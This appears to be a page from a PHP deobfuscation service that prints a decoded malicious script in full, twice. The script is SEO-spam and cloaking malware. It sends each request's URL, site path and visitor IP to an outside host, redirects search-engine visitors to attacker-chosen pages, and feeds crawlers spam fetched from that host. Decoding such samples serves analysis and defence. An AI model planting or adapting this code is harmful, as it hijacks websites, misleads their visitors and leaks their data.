Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $Cdd = ""; $c14 = "http://lll.fk2.us/bmw.php"; header("Content-Type:text/html;ch..
Decoded Output download
<?php
$Cdd = "";
$c14 = "http://lll.fk2.us/bmw.php";
header("Content-Type:text/html;charset=utf-8");
@ob_start();
@set_time_limit(3600);
if (version_compare(PHP_VERSION, "5.1.0", "<")) {
@ini_set("date.timezone", "America/Toronto");
} else {
@date_default_timezone_set("America/Toronto");
}
D31($c14, $Cdd);
function D63() {
if (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) {
$edd = $_SERVER["HTTP_CLIENT_IP"];
} else {
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) {
$edd = $_SERVER
["HTTP_X_FORWARDED_FOR"];
} else {
if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
$edd = $_SERVER["REMOTE_ADDR"];
} else {
if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
$edd = $_SERVER["REMOTE_ADDR"];
} else {
$edd = "unknown";
}
}
}
}
return $edd;
}
function f1A($Eb9) {
if (@ini_get("allow_url_fopen")) {
return file_get_contents($Eb9);
}
$a45 = curl_init
();
curl_setopt($a45, CURLOPT_URL, $Eb9);
curl_setopt($a45, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($a45, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($a45, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($a45, CURLOPT_SSL_VERIFYHOST, 0);
$e28 = curl_exec($a45);
curl_close($a45);
return $e28;
}
function D31($c14, $Cdd = '') {
$Fc4 = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\", "/", $_SERVER["DOCUMENT_ROOT"]) : '';
$Cf6 = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__;
$Cf6 = str_replace("\", "/", $Cf6);
$A99 = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace($Fc4, '', $Cf6);
$A99 = $A99 != '' ? substr($A99, 1) : $A99;
$Fc4 = preg_replace("/\/\$/si", '', $Fc4);
$A99 = strtolower($A99) == "index.php" ? '' : $A99;
$Cf6 = $A99 != '' ? substr($A99, 0, strrpos($A99, "/")) : ($Fc4 != '' ? str_replace($Fc4, '', dirname($Cf6)) : '');
$A99 = preg_replace("/.*\/(.*)/si", "\$1", $A99);
$A99 = strtolower($A99) == "index.php" ? '' : $A99;
$Cf6 = str_replace("\", "/", $Cf6 == '' || $Cf6 == "index.php" ? '' : $Cf6);
$C20 = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : '');
$C20 = $C20 == '' ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != '' ? $_SERVER["PATH_INFO"] : $C20 : $C20;
$D03 = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"];
$D03 = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . $D03;
$C19 = "request_url=" . urlencode("{$D03}{$C20}") . "&www_path=" . urlencode($Cf6) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode($A99) . "&request_type=" . urlencode($Cdd);
if (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) {
$Bdf = F1A("{$c14}?redirect=1&{$C19}");
if (preg_match("/^https?\:\/\//si", $Bdf)) {
header("Location:" . $Bdf);
exit;
} else {
die($Bdf);
}
}
if (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) {
die(F1A("{$c14}?redirect=0&{$C19}"));
}
}
?>
Did this file decode correctly?
Original Code
<?php
$Cdd = "";
$c14 = "http://lll.fk2.us/bmw.php";
header("Content-Type:text/html;charset=utf-8");
@ob_start();
@set_time_limit(3600);
if (version_compare(PHP_VERSION, "5.1.0", "<")) {
@ini_set("date.timezone", "America/Toronto");
} else {
@date_default_timezone_set("America/Toronto");
}
D31($c14, $Cdd);
function D63() {
if (isset($_SERVER["HTTP_CLIENT_IP"]) && strcasecmp($_SERVER["HTTP_CLIENT_IP"], "unknown")) {
$edd = $_SERVER["HTTP_CLIENT_IP"];
} else {
if (isset($_SERVER["HTTP_X_FORWARDED_FOR"]) && strcasecmp($_SERVER["HTTP_X_FORWARDED_FOR"], "unknown")) {
$edd = $_SERVER
["HTTP_X_FORWARDED_FOR"];
} else {
if (isset($_SERVER["REMOTE_ADDR"]) && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
$edd = $_SERVER["REMOTE_ADDR"];
} else {
if (isset($_SERVER["REMOTE_ADDR"]) && $_SERVER["REMOTE_ADDR"] && strcasecmp($_SERVER["REMOTE_ADDR"], "unknown")) {
$edd = $_SERVER["REMOTE_ADDR"];
} else {
$edd = "unknown";
}
}
}
}
return $edd;
}
function f1A($Eb9) {
if (@ini_get("allow_url_fopen")) {
return file_get_contents($Eb9);
}
$a45 = curl_init
();
curl_setopt($a45, CURLOPT_URL, $Eb9);
curl_setopt($a45, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($a45, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($a45, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($a45, CURLOPT_SSL_VERIFYHOST, 0);
$e28 = curl_exec($a45);
curl_close($a45);
return $e28;
}
function D31($c14, $Cdd = '') {
$Fc4 = isset($_SERVER["DOCUMENT_ROOT"]) ? str_replace("\\", "/", $_SERVER["DOCUMENT_ROOT"]) : '';
$Cf6 = isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : __FILE__;
$Cf6 = str_replace("\\", "/", $Cf6);
$A99 = isset($_SERVER["SCRIPT_NAME"]) ? $_SERVER["SCRIPT_NAME"] : str_replace($Fc4, '', $Cf6);
$A99 = $A99 != '' ? substr($A99, 1) : $A99;
$Fc4 = preg_replace("/\\/\$/si", '', $Fc4);
$A99 = strtolower($A99) == "index.php" ? '' : $A99;
$Cf6 = $A99 != '' ? substr($A99, 0, strrpos($A99, "/")) : ($Fc4 != '' ? str_replace($Fc4, '', dirname($Cf6)) : '');
$A99 = preg_replace("/.*\\/(.*)/si", "\$1", $A99);
$A99 = strtolower($A99) == "index.php" ? '' : $A99;
$Cf6 = str_replace("\\", "/", $Cf6 == '' || $Cf6 == "index.php" ? '' : $Cf6);
$C20 = isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : (isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : '');
$C20 = $C20 == '' ? isset($_SERVER["PATH_INFO"]) && $_SERVER["PATH_INFO"] != '' ? $_SERVER["PATH_INFO"] : $C20 : $C20;
$D03 = isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $_SERVER["SERVER_NAME"];
$D03 = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" ? "https" : "http") . "://" . $D03;
$C19 = "request_url=" . urlencode("{$D03}{$C20}") . "&www_path=" . urlencode($Cf6) . "&client_ip=" . urlencode(D63()) . "&request_php=" . urlencode($A99) . "&request_type=" . urlencode($Cdd);
if (isset($_SERVER["HTTP_REFERER"]) && preg_match("/(google|yahoo|yandex|bing|baidu|aol|ask|excite|duckduckgo)/si", $_SERVER["HTTP_REFERER"])) {
$Bdf = F1A("{$c14}?redirect=1&{$C19}");
if (preg_match("/^https?\\:\\/\\//si", $Bdf)) {
header("Location:" . $Bdf);
exit;
} else {
die($Bdf);
}
}
if (isset($_SERVER["HTTP_USER_AGENT"]) && preg_match("/(googlebot|yahoo|slurp|baiduspider|bingbot|google|baidu|aol|bing)/si", $_SERVER["HTTP_USER_AGENT"])) {
die(F1A("{$c14}?redirect=0&{$C19}"));
}
}
?>
Function Calls
header | 1 |
Stats
MD5 | 3ce380f25c7c80f2e93139efd72fa298 |
Eval Count | 0 |
Decode Time | 98 ms |